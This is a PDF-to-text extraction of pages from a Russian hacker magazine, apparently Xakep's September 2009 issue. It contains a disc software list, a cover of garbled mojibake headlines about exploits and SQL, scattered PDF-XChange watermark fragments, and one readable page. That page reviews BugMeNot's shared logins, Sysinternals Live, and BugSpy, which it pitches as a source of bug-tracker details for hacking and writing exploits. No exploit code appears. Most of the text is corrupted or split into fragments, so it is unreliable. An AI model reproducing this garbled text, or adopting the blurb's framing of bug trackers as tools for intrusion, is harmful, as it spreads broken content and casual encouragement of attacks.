DLL Archive 1.01 |
|
Damn Vulnerable Linux |
|
yXML 1.1 |
|
Rspamd 0.2.6 |
FreeFileSync 2.2 |
|
Damn Vulnerable Web App |
|
|
|
Sendmail 8.14.3 |
Glary Undelete |
|
Moth |
|
>Games |
|
Squid 3.0.STABLE18 |
Google Desktop |
|
Mutillidae |
|
Uplink 1.54 |
|
vsftp |
ManicTime 1.2.1 |
|
OWASP WebGoat |
|
|
|
|
OfficeTab 1.21 |
|
Stanford SecuriBench |
|
>Net |
|
>System |
Portable Start Menu 2.1 |
|
|
|
Bitflu 0.92 |
|
ATI Catalyst 9.8 |
SuperF4 1.1 |
|
>System |
|
EisKaltDC 1.0.0 |
|
BIRD 1.1.2 |
Svchost Process Analyzer |
|
Active@ UNDELETE 7.3 |
|
Feed'n Read 0.6.0b |
|
Cedar Backup 2.19.4 |
TextDiff 4.5 |
|
BlueScreenView 1.05 |
|
FileZilla Client 3.2.7.1 |
|
Gizmod 3.5 |
USB Safely Remove 4.1.5 |
|
CCleaner 2.23.993 |
|
Google Chrome 4.0.202.2 Alpha |
|
GNU Coreutils 7.5 |
uTodo |
|
Comodo Internet Security 3.11 |
|
Httping 1.3.1 |
|
Gujin 2.7 |
|
|
Drive Manager 4.08 |
|
LeechCraft 0.3.0 |
|
KDE Partition Manager 1.0 |
>Multimedia |
|
HDD-Profiler 1.0.30 |
|
Mailfilter 0.8.2 |
|
Ksplice 0.9.9 |
Calibrize 2 |
|
knas.Restarter 1.2.1.0 |
|
Mozilla Firefox 3.0.13 |
|
Linux Kernel 2.6.30.5 |
Explore&Burn 1.2.1 |
|
Total Commander 7.50 RC2 |
|
Mozilla Thunderbird 2.0.0.23 |
|
MacPorts 1.8.0 |
Flickr Uploadr 3.2.1 |
|
|
|
OpenMeetings 0.8.4 |
|
nVidia 185.18.36 |
JPEGsnoop 1.4.1 |
|
>>UNIX |
|
Pidgin 2.6.1 |
|
QPxTool 0.7.0 PRE1 |
Photoshop SpeedUp 2.0 |
|
>Desktop |
|
Rekonq 0.2.0 |
|
Remotefs 0.12 |
Rainmeter 1.0 |
|
Allegro Sprite Editor 0.7.1 |
|
Retriever Download Manager 1.7 |
|
Synctool 4.0 |
|
|
aTunes 1.13.3 |
|
Skype 2.1 Beta |
|
VirtualBox 3.0.4 |
>Net |
|
Bombono DVD 0.5 |
|
Smuxi 0.6.4 |
|
VMware 6.5.3 |
Acrylic DNS Proxy 0.9.3 |
|
Cheese 2.26.3 |
|
Transmission 1.74 |
|
Wicd 1.6.2.1 |
Ad Muncher 4.72 |
|
Data Crow 3.4.17 |
|
Xplico 0.5.2 |
|
Wine 1.1.28 |
DownTester 1.20 |
|
Enca 1.10 |
|
XtreemFS 1.0.0 |
|
|
Freeproxy 4.00 |
|
Episoder 0.6.1 |
|
|
|
>X-distr |
Gbridge 2.0.0.1293 |
|
Fotoxx 8.2.2 |
|
|
|
Slackware 13.0 |
x№ 09(129) СЕНТЯБРЬ 2009
2009 )²¦®³À¢±½( 09 x
VOIP «© µ© ¥±´¤©¦ © ¯°±¦¥¦¬©³¦¬¦ª ¡®¯¢ /¦±®¯ ¸´§¯ª
129
°±¯²¬´¹«¡£²³±¯¦®®¼©«±¯µ¯®¯
|
|
w |
w |
|
|
D |
|||
|
w |
|
|
|
|
P |
|
|
|
|
|
|
|
|
|
|
F |
||
|
. |
|
|
|
|
|
|
||
|
p |
Click |
|
|
|
|
|
- |
|
|
f |
|
|
|
|
|
X |
||
|
d |
|
|
|
|
|
|
|
|
|
- |
|
to |
|
|
|
|
C |
|
|
x |
|
|
|
|
|
h |
||
|
c |
|
|
BUY |
|
|
|
a |
|
|
h |
|
|
|
|
|
n |
||
|
a |
|
|
|
|
|
|
|
g |
±¦«¯ |
n |
|
|
|
NOW! |
|
e |
||
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
i |
||
c |
|
|
|
|
|
|
|||
|
g |
|
|
|
|
|
|
|
E |
|
e |
|
|
|
|
|
|
|
d |
|
. |
|
|
|
|
|
|
t |
|
o |
|
|
|
|
|
||||
|
m |
|
|
r |
o |
|
|||
·¦®¡ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
¦®¥¯£¡®®¡À |
|
|
|
|
|
|
|||
: |
|
|
|
|
|
|
|
|
|
210 |
|
|
|
|
|
|
|
|
|
|
Ñ |
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
|
|
²¦®³À¢±½ 09 (129) 2009
¸´§¯ª®¯¦±
¯¢¡® ¯°±¦¥¦¬©³¦¬¦ª © ¥±´¤©¦ µ©¹«© VOIP ²³±. 28
ГРУЗИМ |
|
|
|
|
|
|
|
|
|
|
|
|
|
СУПЕР |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
СПЛОИТЫ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
GPRS |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
¥¬À ²°¬¯©³-²£À¨«© |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||
¥£©§¯« |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
®¡ PYTHON |
|
|
|
|
|
|
|
|
|
|
|
|
|
£¼§©¡¦ |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
¡«²©´ |
|
|
|
|
|
|
|
|
|
||||||||
|
ñòð. 100 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||
ДОБИВАЕМ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
²«¯±¯²³© |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
©¨ ¯¢©¬½®¯¤¯ |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||
|
SQL |
|
|
|
|
|
|
|
|
|
|
|
|
|
©®³¦±®¦³¡ |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ñòð. 32 |
|
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
X-CALLER ID! |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||
°¯±·©À ²£¦§©¶ |
|
НАШЕСТВИЕ |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
МУТАНТОВ |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||||
³±¿«¯£ °¯ ±¡¢¯³¦ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||||
² ©®»¦«·©À© |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
¯¢¨¯± ®¦¯¢¼¸®¼¶ |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
*nix-ЕЙТУСЙВФУЙГПГ |
|
|
|
|
|
|
|
|
|
||||||||||
ñòð. 58 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
ТУШИМ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ñòð. 82 |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
ФАЙРВОЛЫ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||
®¯£¼¦ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
STEALTH-³¦¶®¯¬¯¤©© |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||
®¡ ²¬´§¢¦ ¨¬¯¢®¼¶ |
|
|
|
|
|
|
|
|
|
|
|
|
|
«¡¬¦®¥¡±½ |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
°±¯¤±¡¦±¯£ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
¶¡«¦±²«©¶ |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
³´²¯£¯« |
|
|
|
|
|
|
|
|
|
||||||||||||
ñòð. 104 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
© «¯®µ¦±¦®·©ª ®¡ |
|
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
¯²¦®½-¨©´ 2009 |
|
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ñòð. 76 |
|
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
w |
w |
|
|
|
P |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
D |
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
F |
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
|
- |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
d |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
f Click |
|
|
|
|
|
C |
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
- |
|
|
to |
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
x |
|
|
|
|
|
|
h |
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
c |
|
|
|
BUY |
|
|
|
a |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
h |
|
|
|
|
|
|
n |
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
g |
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
a |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NOW! |
|
e |
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
n |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
E |
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
g |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
e |
|
|
|
|
|
d |
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
|
|
i |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
c |
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
t |
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
m |
|
|
|
r |
o |
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
|
||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
||
P |
|
|
|
|
|
|
NOW! |
o |
|
|
|||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
||
w |
|
|
to |
|
|
|
|
|
UNITS |
|
|||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|||
w Click |
|
|
|
|
|
|
o |
m |
|
|
|||
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
|
.c |
|
|
|
|
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
df |
|
|
|
n |
e |
|
|
|
||
|
|
|
|
-xcha |
|
|
http://www2 |
||||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Чтобы не регистрироваться на левых сайтах
BUGMENOT www.bugmenot.com
Самаябольшаяподставасосторонысайта— попроситьрегистрацию длятого, чтобыскачатькакой-тофайлилиоткрытьстатью. Избавитьтебя отнудногозанятияпосозданиюникомуненужногоаккаунтапоможет сайтBugMeNot. ОттебятребуетсялишьпередатьемуURL назойливого ресурса, атот, еслиповезет, вернетнесколькопарлогин-пароль. База составляетсятакимиже, какиты, пользователямисистемы, инатекущий моментможетдействительнопомочьнабольшинствересурсов. Кстати, дляещебольшегоудобстваяпоставилсебеспециальныйплагиндля Firefox’асэтогожересурса.
Быстрый запуск утилит Sysinternals
Для трансляции видео онлайн
ЯTV yatv.ru
Онлайн-сервисдляорганизациисвоегоперсональноготелевидения.
Одинизсамыхпростыхспособов, сидягде-нибудьвдалекеотдома, организоватьтрансляциюкрасотсосвоейвеб-камерынапрямуювСеть. Все, чтонужно— камера, браузериболее-менеешустрыйинет. Сдругой стороны, никтонеобязываеттебявещатьсвеб-камерыиприжелании можноустроитьнастоящийтелеканал, транслируясмонтированные ролики. Созданиетелепрограммы, различныхуровнейдоступа, живого общениясозрителями— всектвоимуслугам.
Для поиска информации о багах в программах
SYSINTERNALS LIVE BUGSPY live.sysinternals.com bugspy.net
СпомощьюклассныхутилитМаркаРуссиновичаможнотворить чудеса. Реанимироватьсистему? Да! Отловитьруткит? Возможно! Чего стоятоднитолькомониторизмененийвреестреифайловойсистеме. Однапроблема– такоеколичествотулзсложновсегдаиметьподрукой. Теперьможнонепаритьсяспоискомнасвоемжесткомдискеинезакачиватьтулзызаново, каждыйразраспаковываяих. Клюбойутилитевсегда можнообратиться, набраввбраузере: http://live.sysinternals.com НАЗВАНИЕ_ПРОГРАММЫ. Бинарникзакэшируетсяитутжезапустится.
Еслинайтиподходящийсплоитнеполучается,егоможнопопробовать написатьсаму.Идляэтого,возможно,даженепридетсяискатьбаги.Уболь- шинстваоткрытыхпроектовсистемабаг-трекинга,т.е.учетаошибок,находится воткрытомдоступе:каждыйможетдобавитьинформациюобагеипрочитать существующиетикеты,гдепочерпнетполезнуюдлявзломаинфу.BugSpy—это оченьинтересныйпроект,которыйаггрегируетводномместеинформациюс огромногочислачислаисточников,предпочитаякритическиеуязвимости.И самоеглавное—позволяетосуществлятьпонейпоиск.
144 |
XÀÊÅÐ 09 /129/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Реклама